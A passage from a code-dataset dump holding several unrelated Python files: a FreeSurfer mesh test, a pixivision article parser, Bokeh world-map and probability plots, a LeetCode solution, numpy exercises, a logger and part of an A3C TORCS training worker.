'pyfreesurfer.utils.surftools.apply_affine_on_mesh'\n \"\"\"\n def setUp(self):\n \"\"\" Define function parameters.\n \"\"\"\n # Construct an eight-sided polyhedron.\n f = math.sqrt(2.0) / 2.0\n verts = [\n (0, -1, 0),\n (-f, 0, f),\n (f, 0, f),\n (f, 0, -f),\n (-f, 0, -f),\n (0, 1, 0)]\n faces = [\n (0, 2, 1),\n (0, 3, 2),\n (0, 4, 3),\n (0, 1, 4),\n (5, 1, 2),\n (5, 2, 3),\n (5, 3, 4),\n (5, 4, 1)]\n labels = range(6)\n meta = dict((index, {\"color\": (1, 1, 1, 1)}) for index in labels)\n\n self.kwargs = {\n \"vertices\": numpy.asarray(verts),\n \"affine\": numpy.eye(4)\n }\n\n def test_normal_execution(self):\n \"\"\" Test the normal behaviour of the function.\n \"\"\"\n # Test execution\n warp_vertex = apply_affine_on_mesh(**self.kwargs)\n self.assertTrue(numpy.allclose(self.kwargs[\"vertices\"], warp_vertex))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pyfreesurfer/tests/test_utils/test_surftools.py","file_name":"test_surftools.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"85052649","text":"from omega_miya.database import DBPixivision, Result\nfrom omega_miya.utils.pixiv_utils import PixivisionArticle\n\n\nasync def pixivsion_article_parse(aid: int, tags: list) -> Result.DictResult:\n article_result = await PixivisionArticle(aid=aid).get_article_info()\n if article_result.error:\n return Result.DictResult(error=True, info=article_result.info, result={})\n\n try:\n if not tags:\n tags = [x.get('tag_name') for x in article_result.result.get('tags_list')]\n\n article_info = dict(article_result.result)\n\n title = str(article_info['article_title'])\n description = str(article_info['article_description'])\n url = f'https://www.pixivision.net/zh/a/{aid}'\n illusts_list = []\n\n for illust in article_info['illusts_list']:\n illusts_list.append(int(illust['illusts_id']))\n\n pixivision = DBPixivision(aid=aid)\n db_res = await pixivision.add(title=title, description=description,\n tags=repr(tags), illust_id=repr(illusts_list), url=url)\n if db_res.success():\n __res = {\n 'title': title,\n 'description': description,\n 'url': url,\n 'image:': article_info['article_eyecatch_image'],\n 'illusts_list': illusts_list\n }\n result = Result.DictResult(error=False, info='Success', result=__res)\n else:\n result = Result.DictResult(error=True, info=db_res.info, result={})\n except Exception as e:\n result = Result.DictResult(error=True, info=repr(e), result={})\n return result\n","sub_path":"omega_miya/plugins/pixivsion_monitor/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"78853975","text":"import pandas as pd\nimport numpy as np\nfrom bokeh.plotting import curdoc, figure, save, output_file, gridplot, vplot, show, ColumnDataSource\nimport bokeh.palettes as palette\nfrom bokeh.palettes import Blues8\nfrom bokeh.models import Range1d\nfrom bokeh.models import CustomJS, HoverTool, ColorBar, LinearColorMapper, layouts, FixedTicker\nfrom bokeh.models.widgets import Slider, TextInput\nfrom bokeh.embed import components\nfrom bokeh.layouts import gridplot, row, column, widgetbox\nfrom bokeh.models import BoxSelectTool, LassoSelectTool, Spacer, PrintfTickFormatter\nfrom bokeh.models.glyphs import Segment\nimport copy\n\ndef world_map(countrypdf, countries):\n \n countryObject = {}\n for country in countries['features']:\n \n geometry_type = 
country['geometry']['type']\n country_xs = []\n country_ys = []\n if country['id'] in countrypdf.index:\n if geometry_type == \"MultiPolygon\":\n i = 0\n for poly_coords in country['geometry']['coordinates']:\n coords = poly_coords[0]\n country_xs.extend(x[0] for x in coords)\n country_ys.extend(x[1] for x in coords)\n countryObject[country['id'] + '_{:d}'.format(i)] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id']].tolist()[0]\n }\n i = i + 1\n else:\n coords = country['geometry']['coordinates'][0]\n countryObject[country['id'] + '_0'] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id']].tolist()[0]\n }\n\n df = pd.DataFrame(countryObject)\n \n colormap =cm.get_cmap(\"RdPu\")\n p = figure(\n width = 700,\n height=350,\n title='',\n x_axis_label='Longitude',\n y_axis_label='Latitude',\n webgl=True\n )\n \n countryprobs = countrypdf[0].tolist()\n crange = np.linspace(np.min(countryprobs), np.max(countryprobs), 100)\n irange = np.linspace(0, 1, 100)\n A_color=colormap(irange,1,True)\n # convert to hex to fit to bokeh\n bokeh_colors = [\"#%02x%02x%02x\" % (r, g, b) for r, g, b in A_color[:,0:3]]\n \n for (index,country) in enumerate(df):\n val, idx = min((val, idx) for (idx, val) in enumerate(abs(crange - df[country]['p'])))\n p.patch(\n x=df[country]['x'],\n y=df[country]['y'],\n color=bokeh_colors[idx],\n alpha = .5\n )\n p.x_range = Range1d(start = -180, end = 180)\n p.y_range = Range1d(start = -90, end = 90)\n\n script, div = components(p)\n\n return script, div\n\ndef new_world_map(countrypdf, countries):\n \n countryObject = {}\n for country in countries['features']:\n \n geometry_type = country['geometry']['type']\n country_xs = []\n country_ys = []\n if country['id'] in countrypdf.index:\n if geometry_type == \"MultiPolygon\":\n i = 0\n for poly_coords in country['geometry']['coordinates']:\n coords = poly_coords[0]\n country_xs.extend(x[0] for x in coords)\n country_ys.extend(x[1] for x in coords)\n countryObject[country['id'] + '_{:d}'.format(i)] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id'],'ar'],\n 'v': countrypdf.loc[country['id'],'val'],\n 'perc': countrypdf.loc[country['id'],'ar'] * 100,\n 'name': country['properties']['name']\n }\n i = i + 1\n else:\n coords = country['geometry']['coordinates'][0]\n countryObject[country['id'] + '_0'] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id'],'ar'],\n 'v': countrypdf.loc[country['id'],'val'],\n 'perc': countrypdf.loc[country['id'],'ar'] * 100,\n 'name': country['properties']['name']\n }\n\n country_xs = [country['x'] for country in countryObject.values()]\n country_ys = [country['y'] for country in countryObject.values()]\n country_ps = [country['p'] for country in countryObject.values()]\n country_vs = [country['v'] for country in countryObject.values()]\n country_percs = [country['perc'] for country in countryObject.values()]\n country_names = [country['name'] for country in countryObject.values()]\n\n df = pd.DataFrame(countryObject)\n source = ColumnDataSource(data=dict(\n x=country_xs,\n y=country_ys,\n p=country_ps,\n v=country_vs,\n perc=country_percs,\n name=country_names))\n\n Blues8.reverse()\n color_mapper = LinearColorMapper(palette=Blues8, low=0.5, high=1.0)\n TOOLS=\"pan,wheel_zoom,box_zoom,reset,hover,save\"\n\n p = figure(width = 700, height=350, title='', x_axis_label='Longitude', y_axis_label='Latitude', 
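# [editor's note] world_map() above calls cm.get_cmap("RdPu"), but the import
# block of this file never binds `cm`; it presumably needs
# `from matplotlib import cm`. A sketch of the probability-to-hex mapping it
# performs:
#
#   from matplotlib import cm
#   irange = np.linspace(0, 1, 100)
#   rgba = cm.get_cmap("RdPu")(irange, 1, True)   # bytes=True -> 0..255 ints
#   hex_colors = ["#%02x%02x%02x" % (r, g, b) for r, g, b in rgba[:, 0:3]]
#
# Each country's probability is then matched to the nearest entry in a linear
# ramp over [min(p), max(p)] to pick its fill color.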
webgl=True,\n tools=TOOLS)\n p.patches('x', 'y', source=source,\n fill_color={'field': 'p', 'transform': color_mapper},\n fill_alpha=0.5, line_color=\"white\", line_width=0.5)\n p.x_range = Range1d(start = -180, end = 180)\n p.y_range = Range1d(start = -90, end = 90)\n \n hover = p.select(HoverTool)\n hover.point_policy = \"follow_mouse\"\n hover.tooltips = [(\"Country\", \"@name\"), (\"Acceptance Rate\", \"@perc%\"), (\"Applications\", \"@v\"),]\n \n color_bar = ColorBar(color_mapper=color_mapper, orientation='vertical',\n location='bottom_left', scale_alpha=0.5,\n ticker=FixedTicker(ticks=[0.5, 0.6, 0.7, 0.8, 0.9, 1.0]))\n p.add_layout(color_bar)\n\n script, div = components(p)\n\n return script, div\n\ndef temp_world_map(countrypdf, countries):\n \n countryObject = {}\n for country in countries['features']:\n \n geometry_type = country['geometry']['type']\n country_xs = []\n country_ys = []\n if country['id'] in countrypdf.index:\n if geometry_type == \"MultiPolygon\":\n i = 0\n for poly_coords in country['geometry']['coordinates']:\n coords = poly_coords[0]\n country_xs.extend(x[0] for x in coords)\n country_ys.extend(x[1] for x in coords)\n countryObject[country['id'] + '_{:d}'.format(i)] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id'],'ar'],\n 'perc': countrypdf.loc[country['id'],'ar'] * 100,\n 'name': country['properties']['name']\n }\n i = i + 1\n else:\n coords = country['geometry']['coordinates'][0]\n countryObject[country['id'] + '_0'] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id'],'ar'],\n 'perc': countrypdf.loc[country['id'],'ar'] * 100,\n 'name': country['properties']['name']\n }\n\n country_xs = [country['x'] for country in countryObject.values()]\n country_ys = [country['y'] for country in countryObject.values()]\n country_ps = [country['p'] for country in countryObject.values()]\n country_percs = [country['perc'] for country in countryObject.values()]\n country_names = [country['name'] for country in countryObject.values()]\n\n df = pd.DataFrame(countryObject)\n source = ColumnDataSource(data=dict(\n x=country_xs,\n y=country_ys,\n p=country_ps,\n perc=country_percs,\n name=country_names))\n\n #Blues8.reverse()\n color_mapper = LinearColorMapper(palette=Blues8, low=0.0, high=1.0)\n TOOLS=\"pan,wheel_zoom,box_zoom,reset,hover,save\"\n\n p = figure(width = 700, height=350, title='', x_axis_label='Longitude', y_axis_label='Latitude', webgl=True,\n tools=TOOLS)\n p.patches('x', 'y', source=source,\n fill_color={'field': 'p', 'transform': color_mapper},\n fill_alpha=0.5, line_color=\"white\", line_width=0.5)\n p.x_range = Range1d(start = -180, end = 180)\n p.y_range = Range1d(start = -90, end = 90)\n \n hover = p.select(HoverTool)\n hover.point_policy = \"follow_mouse\"\n hover.tooltips = [(\"Country\", \"@name\"), (\"Industry, value added\", \"@p\"),]\n \n color_bar = ColorBar(color_mapper=color_mapper, orientation='vertical',\n location='bottom_left', scale_alpha=0.5,\n ticker=FixedTicker(ticks=[0.0, 0.2, 0.4, 0.6, 0.8, 1.0]))\n p.add_layout(color_bar)\n\n script, div = components(p)\n\n return script, div\n\n\ndef prob_widget_plot(singleval, dft, cfr, cfr_audit):\n\n singleval = pd.DataFrame(data = singleval, index=[0])\n X = dft.transform(singleval)\n prob = cfr.predict_proba(X)[0][1]\n prob_audit = cfr_audit.predict_proba(X)[0][1]\n \n ## And now plot based on probabilities\n factors = [\"Failure\", \"Success\"]\n x = [100.0*(1.0 - prob), 100.0*prob]\n source = 
ColumnDataSource(data=dict(x0=[0]*2, y0=factors, x1=x, y1=factors,))\n\n ## Application Success\n app = figure(title=\"Application Success\", tools=\"\", toolbar_location=None,\n y_range=factors, x_range=[0,100], plot_width=400, plot_height=200, webgl=True)\n\n glyph = Segment(x0=\"x0\", y0=\"y0\", x1=\"x1\", y1=\"y1\", line_width=20, line_color=\"blue\", line_alpha=0.5)\n app.add_glyph(source, glyph)\n\n #app.segment(source=source, line_width=20, line_color=\"blue\", line_alpha=0.5)\n \n ## Probability of being audited\n factors = [\"No Audit\", \"Audit\"]\n x = [100.0*(1.0 - prob_audit), 100.0*prob_audit]\n\n audit = figure(title=\"Audit Probability\", tools=\"\", toolbar_location=None,\n y_range=factors, x_range=[0,100], plot_width=400, plot_height=200, webgl=True)\n \n audit.segment(0, factors, x, factors, line_width=20, line_color=\"blue\", line_alpha=0.5)\n \n callback = CustomJS(args=dict(source=source), code=\"\"\"\n var data = source.get('data');\n var f = cb_obj.get('value')\n x1 = data['x1']\n x1[1] = 100.0 * (1.1 - 0.5 * f**(-1.0/10.0))\n x1[0] = 100.0 * (1.0 - (1.1 - 0.5 * f**(-1.0/10.0)))\n source.trigger('change');\n \"\"\")\n \n #def callback(source=source, window=None):\n #data = source.get('data')\n #f = float(cb_obj.get('value'))\n #x1 = data['x1']\n #singleval.loc[0,'wage'] = f\n #X = dft.transform(singleval)\n #prob = cfr.predict_proba(X)[0][1]\n\n #data['x1'][1] = 100.0 * (1.1 - 0.5 * f**(-1.0/10.0))\n #data['x1'][0] = 100.0 * (1.0 - (1.1 - 0.5 * f**(-1.0/10.0)))\n #source.trigger('change')\n \n #wage = Slider(title=\"Expected Wage\", value=100000.0, start=0.0, end=500000.0, step=10000.0, callback=callback)\n wage = TextInput(title=\"Expected Wage ($)\", value='100000', callback=callback)\n\n p = row(column(app, audit), wage)\n script, div = components(p)\n\n return script, div, prob, prob_audit\n\ndef convert_indices(record, state_i, country_i):\n\n dftemp = pd.merge(record, state_i, on=['state', 'int_year'], how='left')\n tlist = [col for col in dftemp.columns if 'bea' in col]\n dftemp[tlist] = dftemp[tlist].fillna(dftemp[tlist].mean()).dropna(axis=1, how='all')\n record_out = pd.merge(dftemp, country_i, on=['isos', 'int_year'], how='left')\n tlist = [col for col in dftemp.columns if 'WB_' in col]\n record_out[tlist] = record_out[tlist].fillna(record_out[tlist].mean()).dropna(axis=1, how='all')\n\n return record_out\n\ndef prob_calc(globalval, dft, cfr, state_i, country_i):\n \n singleval = copy.deepcopy(globalval)\n singleval = pd.DataFrame(data = singleval, index=[0])\n singleval = convert_indices(singleval, state_i, country_i)\n X = dft.transform(singleval)\n prob = cfr.predict_proba(X)[0][1]\n #prob_audit = cfr_audit.predict_proba(X)[0][1]\n\n return prob\n\ndef prob_feat_calc(globalval, rangerecord, dft, cfr, ref_prob, state_i, country_i):\n \n probrange = copy.deepcopy(globalval)\n total = 0.0\n maxprob = 0.0\n maxkey = 0.0\n maxval = 0.0\n \n ckeys = ['online', 'no_lawyer', 'state']\n cmsgs = {'online': 'we recommend that you try submitting your application online.',\n 'no_lawyer': 'we recommend that you seek the assistance of a lawyer.',\n 'state': 'have you considered applying for a job in a different state, like '}\n \n for k,vals in rangerecord.iteritems():\n \n probs = []\n nrep = len(vals)\n tempval = {}\n for ka, v in globalval.iteritems():\n if ka == k:\n tempval[ka] = vals\n else:\n tempval[ka] = [v] * nrep\n singleval = pd.DataFrame(data = tempval)\n singleval = convert_indices(singleval, state_i, country_i)\n X = dft.transform(singleval)\n probs = 
cfr.predict_proba(X)[:,1]\n if k in ckeys:\n rel_prob = max(probs) - ref_prob\n if rel_prob > maxprob:\n maxprob = rel_prob\n maxkey = k\n maxval = vals[np.argmax(probs)]\n probrange[k] = max(probs) - min(probs)\n total += probrange[k]\n \n for k,vals in rangerecord.iteritems():\n \n probrange[k] = probrange[k] / total\n\n #print probrange\n #probrange = [{\"label\":k,\"value\":v} for k,v in probrange.iteritems() if v > 0.0]\n \n if maxprob > 0.0:\n if maxkey == 'state':\n msg = 'To increase your chances, ' + cmsgs[maxkey] + maxval.title() + '.'\n else:\n msg = 'To increase your chances, ' + cmsgs[maxkey]\n else:\n msg = ''\n\n return probrange, msg, maxprob\n\ndef prob_plot(singleval, dft, cfr, cfr_audit):\n\n singleval = pd.DataFrame(data = singleval, index=[0])\n X = dft.transform(singleval)\n prob = cfr.predict_proba(X)[0][1]\n prob_audit = cfr_audit.predict_proba(X)[0][1]\n \n ## And now plot based on probabilities\n factors = [\"Failure\", \"Success\"]\n x = [100.0*(1.0 - prob), 100.0*prob]\n source = ColumnDataSource(data=dict(x0=[0]*2, y0=factors, x1=x, y1=factors,))\n\n ## Application Success\n app = figure(title=\"Application Success\", tools=\"\", toolbar_location=None,\n y_range=factors, x_range=[0,100], plot_width=700, plot_height=200, webgl=True)\n\n glyph = Segment(x0=\"x0\", y0=\"y0\", x1=\"x1\", y1=\"y1\", line_width=20, line_color=\"blue\", line_alpha=0.5)\n app.add_glyph(source, glyph)\n\n #app.segment(source=source, line_width=20, line_color=\"blue\", line_alpha=0.5)\n \n ## Probability of being audited\n factors = [\"No Audit\", \"Audit\"]\n x = [100.0*(1.0 - prob_audit), 100.0*prob_audit]\n\n audit = figure(title=\"Audit Probability\", tools=\"\", toolbar_location=None,\n y_range=factors, x_range=[0,100], plot_width=700, plot_height=200, webgl=True)\n \n audit.segment(0, factors, x, factors, line_width=20, line_color=\"blue\", line_alpha=0.5)\n\n p = column(app, audit)\n script, div = components(p)\n\n return script, div, prob, prob_audit\n\ndef single_cat(data, col1, c1min, c1max, l1):\n \n datalim = data[(data[col1] <= c1max)]\n data_acc = datalim[datalim['accept'] == 1]\n data_den = datalim[datalim['accept'] == 0]\n x = data_acc[col1].tolist()\n xb = data_den[col1].tolist()\n\n # create the horizontal histogram\n hhist, hedges = np.histogram(x, bins=70, normed=False)\n hedges = [np.exp(a) / 1000.0 for a in hedges]\n hzeros = np.zeros(len(hedges)-1)\n hbhist, hbedges = np.histogram(xb, bins=70, normed=False)\n hbedges = [np.exp(a) / 1000.0 for a in hbedges]\n hbzeros = np.zeros(len(hbedges)-1)\n hmax = max(hhist)*1.1\n hbmax = max(hbhist)*1.1\n hmax = max([hmax, hbmax])\n\n LINE_ARGS = dict(color=\"#ff0000\", line_color=None)\n\n TOOLS=\"pan,wheel_zoom,box_select,lasso_select,reset\"\n ph = figure(tools=TOOLS, toolbar_location=\"above\", plot_width=700, plot_height=500,\n x_range=(np.exp(c1min) / 1000.0, np.exp(c1max) / 1000.0),\n x_axis_type=\"log\", y_range=(0, hmax), min_border=10, min_border_left=50, y_axis_location=\"right\", x_axis_label = l1, y_axis_label = 'Number of Applications', webgl=True)\n ph.xgrid.grid_line_color = None\n ph.yaxis.major_label_orientation = np.pi/4\n ph.background_fill_color = \"#ffffff\"\n\n ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hhist, color=\"white\", line_color=\"#ff0000\")\n ph.quad(bottom=0, left=hbedges[:-1], right=hbedges[1:], top=hbhist, alpha=0.5,\n color=\"#0000ff\", line_color=None)\n #ph.legend.location = \"top_right\"\n ph.yaxis[0].ticker.desired_num_ticks = 3\n 
ph.xaxis[0].ticker=FixedTicker(ticks=[10,20,50,100,200,500])\n ph.xaxis[0].formatter = PrintfTickFormatter(format=\"$ %4fk\")\n ph.yaxis[0].formatter = PrintfTickFormatter(format=\"%4.1e\")\n\n script, div = components(ph)\n\n return script, div\n\ndef double_cat(data, col1, col2, c1max, c2max, l1, l2):\n \n datalim = data[np.logical_and(data[col1] <= c1max, data[col2] <= c2max)]\n data_acc = datalim[datalim['accept'] == 1]\n data_den = datalim[datalim['accept'] == 0]\n x = data_acc[col1].tolist()\n y = data_acc[col2].tolist()\n xb = data_den[col1].tolist()\n yb = data_den[col2].tolist()\n\n TOOLS=\"pan,wheel_zoom,box_select,lasso_select,reset\"\n\n # create the scatter plot\n p = figure(tools=TOOLS, plot_width=500, plot_height=500, min_border=10, min_border_left=50,\n toolbar_location=\"above\",\n title=\"\", webgl=True)\n p.background_fill_color = \"#ffffff\"\n p.select(BoxSelectTool).select_every_mousemove = False\n p.select(LassoSelectTool).select_every_mousemove = False\n\n r = p.scatter(x, y, size=3, color=\"#ff0000\", alpha=0.5, legend=\"Accepted\")\n rb = p.scatter(xb, yb, size=3, color=\"#0000ff\", alpha=0.5, legend=\"Denied\")\n p.legend.location = \"bottom_right\"\n\n # create the horizontal histogram\n hhist, hedges = np.histogram(x, bins=20, normed=True)\n hzeros = np.zeros(len(hedges)-1)\n hbhist, hbedges = np.histogram(xb, bins=20, normed=True)\n hbzeros = np.zeros(len(hbedges)-1)\n hmax = max(hhist)*1.1\n hbmax = max(hbhist)*1.1\n hmax = max([hmax, hbmax])\n\n LINE_ARGS = dict(color=\"#ff0000\", line_color=None)\n\n ph = figure(toolbar_location=None, plot_width=p.plot_width, plot_height=200, x_range=p.x_range,\n y_range=(-hmax, hmax), min_border=10, min_border_left=50, y_axis_location=\"right\", x_axis_label = l1, webgl=True)\n ph.xgrid.grid_line_color = None\n ph.yaxis.major_label_orientation = np.pi/4\n ph.background_fill_color = \"#ffffff\"\n\n ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hhist, color=\"white\", line_color=\"#ff0000\")\n ph.quad(bottom=0, left=hbedges[:-1], right=hbedges[1:], top=hbhist, alpha=0.5, color=\"#0000ff\", line_color=None)\n hh1 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.5, **LINE_ARGS)\n hh2 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.1, **LINE_ARGS)\n ph.yaxis[0].ticker.desired_num_ticks = 3\n ph.xaxis[0].formatter = PrintfTickFormatter(format=\"%4.1e\")\n ph.yaxis[0].formatter = PrintfTickFormatter(format=\"%4.1e\")\n\n # create the vertical histogram\n vhist, vedges = np.histogram(y, bins=20, normed=True)\n vzeros = np.zeros(len(vedges)-1)\n vbhist, vbedges = np.histogram(yb, bins=20, normed=True)\n vbzeros = np.zeros(len(vbedges)-1)\n vmax = max(vhist)*1.1\n vbmax = max(vbhist)*1.1\n vmax = max([vmax, vbmax])\n\n pv = figure(toolbar_location=None, plot_width=200, plot_height=p.plot_height, x_range=(-vmax, vmax),\n y_range=p.y_range, min_border=10, y_axis_location=\"right\", y_axis_label= l2, webgl=True)\n pv.ygrid.grid_line_color = None\n pv.xaxis.major_label_orientation = np.pi/4\n pv.background_fill_color = \"#ffffff\"\n\n pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vhist, color=\"white\", line_color=\"#ff0000\")\n pv.quad(left=0, bottom=vbedges[:-1], top=vbedges[1:], right=vbhist, alpha = 0.5, color=\"#0000ff\", line_color=None)\n vh1 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.5, **LINE_ARGS)\n vh2 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.1, **LINE_ARGS)\n 
pv.xaxis[0].ticker.desired_num_ticks = 3\n #pv.yaxis[0].formatter = PrintfTickFormatter(format=\"%4.1e\")\n pv.xaxis[0].formatter = PrintfTickFormatter(format=\"%4.1e\")\n\n layout = column(row(p, pv), row(ph, Spacer(width=200, height=200)))\n \n def update(attr, old, new):\n inds = np.array(new['1d']['indices'])\n if len(inds) == 0 or len(inds) == len(x):\n hhist1, hhist2 = hzeros, hzeros\n vhist1, vhist2 = vzeros, vzeros\n else:\n neg_inds = np.ones_like(x, dtype=np.bool)\n neg_inds[inds] = False\n hhist1, _ = np.histogram(x[inds], bins=hedges)\n vhist1, _ = np.histogram(y[inds], bins=vedges)\n hhist2, _ = np.histogram(x[neg_inds], bins=hedges)\n vhist2, _ = np.histogram(y[neg_inds], bins=vedges)\n\n hh1.data_source.data[\"top\"] = hhist1\n hh2.data_source.data[\"top\"] = -hhist2\n vh1.data_source.data[\"right\"] = vhist1\n vh2.data_source.data[\"right\"] = -vhist2\n\n r.data_source.on_change('selected', update)\n\n script, div = components(layout)\n\n return script, div","sub_path":"heroku_app/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":21930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"330777728","text":"\"\"\"\nAuthor: Jing (https://github.com/gnijuohz)\n\nTrapping Rain Water: https://oj.leetcode.com/problems/trapping-rain-water \n\n\nGiven n non-negative integers representing an elevation map where the width of each bar is 1, compute how much water it is able to trap after raining. \n\n\n\nFor example, \nGiven [0,1,0,2,1,0,1,3,2,1,2,1], return 6.\n\n\n\n\nThe above elevation map is represented by array [0,1,0,2,1,0,1,3,2,1,2,1]. In this case, 6 units of rain water (blue section) are being trapped. Thanks Marcos for contributing this image! \nTags\nArray, Stack, Two Pointers \n\"\"\"\n\nclass Solution:\n # @param A, a list of integers\n # @return an integer\n def trap(self, A):\n res = []\n if len(A) <= 2:\n return 0\n for i in range(len(A)):\n if i == 0 and A[i] > A[i+1]:\n res.append(i)\n elif i == len(A)-1:\n if A[i] > A[i-1]:\n while len(res) >= 2 and A[i] > A[res[-1]] and A[res[-1]] <= A[res[-2]]:\n res.pop()\n res.append(i)\n elif A[i] >= A[i-1] and A[i] >= A[i+1]:\n while len(res) >=2 and A[i] >= A[res[-1]] and A[res[-1]] <= A[res[-2]]:\n res.pop()\n res.append(i)\n if len(res) < 2:\n return 0\n num = 0\n for i in range(len(res)-1):\n for j in A[res[i]+1:res[i+1]]:\n num += max(0, min(A[res[i]],A[res[i+1]])-j)\n return num\n \n ","sub_path":"solutions/Trapping-Rain-Water.py","file_name":"Trapping-Rain-Water.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"516201197","text":"# coding:utf-8\n'''\nCreated on 2017/10/31.\n\n@author: chk01\n'''\nimport numpy as np\n\n\ndef normalize(x):\n # axis=1 行\n x_norm = np.linalg.norm(x, axis=1, keepdims=True)\n x = x / x_norm\n\n return x\n\n\ndef softmax(x):\n x_exp = np.exp(x)\n x_sum = np.sum(x_exp, axis=1, keepdims=True)\n s = x_exp / x_sum\n return s\n\n\ndef L1(yhat, y):\n loss = np.sum(np.abs(y - yhat))\n return loss\n\n\ndef L2(yhat, y):\n loss = np.dot((y - yhat), (y - yhat).T)\n return loss\n\n\nif __name__ == '__main__':\n x = np.array([\n [9, 2, 5, 0, 0],\n [7, 5, 0, 0, 0]])\n yhat = np.array([.9, 0.2, 0.1, .4, .9])\n y = np.array([1, 0, 0, 1, 1])\n print(softmax(x))\n print(\"L1 = \" + str(L1(yhat, y)))\n print(\"L2 = \" + str(L2(yhat, 
y)))\n","sub_path":"Andrew_NG_learning/class_one/week_two/Dxq_1.py","file_name":"Dxq_1.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"585662647","text":"\r\nimport os\r\nimport logging\r\nfrom constants import LOG_DIR\r\n\r\n\r\n\r\n\r\nclass Logger:\r\n '''\r\n Custom Logger\r\n '''\r\n\r\n def __init__(self, dir=LOG_DIR, name='cleaner_logger'):\r\n '''\r\n Setuping the Logging object\r\n '''\r\n\r\n \r\n # Try to create the path to the Log file\r\n try:\r\n # Going back a folder\r\n log_folder = os.path.abspath(os.path.join(dir, \"..\"))\r\n \r\n os.makedirs(log_folder)\r\n\r\n # If the path exists\r\n except FileExistsError:\r\n pass\r\n\r\n\r\n\r\n # Delete the previous Log file\r\n try:\r\n os.remove(dir)\r\n \r\n # If it does not exist, create it\r\n except FileNotFoundError:\r\n open(dir, 'w')\r\n\r\n\r\n\r\n self.logger = logging.getLogger(name)\r\n self.logger.setLevel(logging.DEBUG)\r\n\r\n # F I L E H A N D L I N G\r\n #####################################################################################\r\n # The path to the current file\r\n curr_dir_path = os.path.dirname(os.path.abspath(__file__))\r\n\r\n # Creating the File Handler for the Logging\r\n f_handler = logging.FileHandler(os.path.join(curr_dir_path, dir))\r\n #####################################################################################\r\n\r\n\r\n # F O R M A T T I N G H A N D L I N G\r\n #####################################################################################\r\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\r\n f_handler.setFormatter(formatter)\r\n #####################################################################################\r\n\r\n # Adding the Formatted File Handler to the Logging object\r\n self.logger.addHandler(f_handler)\r\n\r\n def add(self, string):\r\n self.logger.debug(str(string))\r\n\r\n","sub_path":"Cleaner/output/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"300891127","text":"import numpy as np\nimport tensorflow as tf\nfrom env_wrapper import TorcsWrapper\nfrom utils import update_target_graph, discount\nfrom network import Network\n\nclass Worker():\n def __init__(self, index, name, state_size, action_size, trainer, model_path, global_episodes):\n self.name = \"worker_\" + str(name)\n self.number = name\n self.model_path = model_path\n self.trainer = trainer\n self.global_episodes = global_episodes\n self.increment = self.global_episodes.assign_add(1)\n self.episode_rewards = []\n self.episode_lengths = []\n self.episode_mean_values = []\n self.summary_writer = tf.summary.FileWriter(\"train_\" + str(self.number))\n\n # Local network\n self.local_network = Network(state_size, action_size, self.name, trainer)\n\n # Update operations\n self.update_local_ops = update_target_graph('global', self.name)\n\n # # The Below code is related to setting up the Doom environment\n # game.set_doom_scenario_path(\"basic.wad\") # This corresponds to the simple task we will pose our agent\n # game.set_doom_map(\"map01\")\n # game.set_screen_resolution(ScreenResolution.RES_160X120)\n # game.set_screen_format(ScreenFormat.GRAY8)\n # game.set_render_hud(False)\n # game.set_render_crosshair(False)\n # game.set_render_weapon(True)\n # game.set_render_decals(False)\n # game.set_render_particles(False)\n # 
game.add_available_button(Button.MOVE_LEFT)\n # game.add_available_button(Button.MOVE_RIGHT)\n # game.add_available_button(Button.ATTACK)\n # game.add_available_game_variable(GameVariable.AMMO2)\n # game.add_available_game_variable(GameVariable.POSITION_X)\n # game.add_available_game_variable(GameVariable.POSITION_Y)\n # game.set_episode_timeout(300)\n # game.set_episode_start_time(10)\n # game.set_window_visible(False)\n # game.set_sound_enabled(False)\n # game.set_living_reward(-1)\n # game.set_mode(Mode.PLAYER)\n # game.init()\n # self.actions = self.actions = np.identity(a_size, dtype=bool).tolist() # ?\n # End Doom set-up\n self.env = TorcsWrapper(port=3101+index)\n\n def train(self, rollout, sess, gamma, bootstrap_value):\n rollout = np.array(rollout)\n observations = np.asarray([ _ for _ in rollout[:, 0]])\n actions = rollout[:, 1]\n rewards = rollout[:, 2]\n next_observations = np.asarray([ _ for _ in rollout[:, 3]])\n values = rollout[:, 5]\n\n # Here we take the rewards and values from the rollout, and use them to\n # generate the advantage and discounted returns.\n # The advantage function uses \"Generalized Advantage Estimation\"\n self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])\n discounted_rewards = discount(self.rewards_plus, 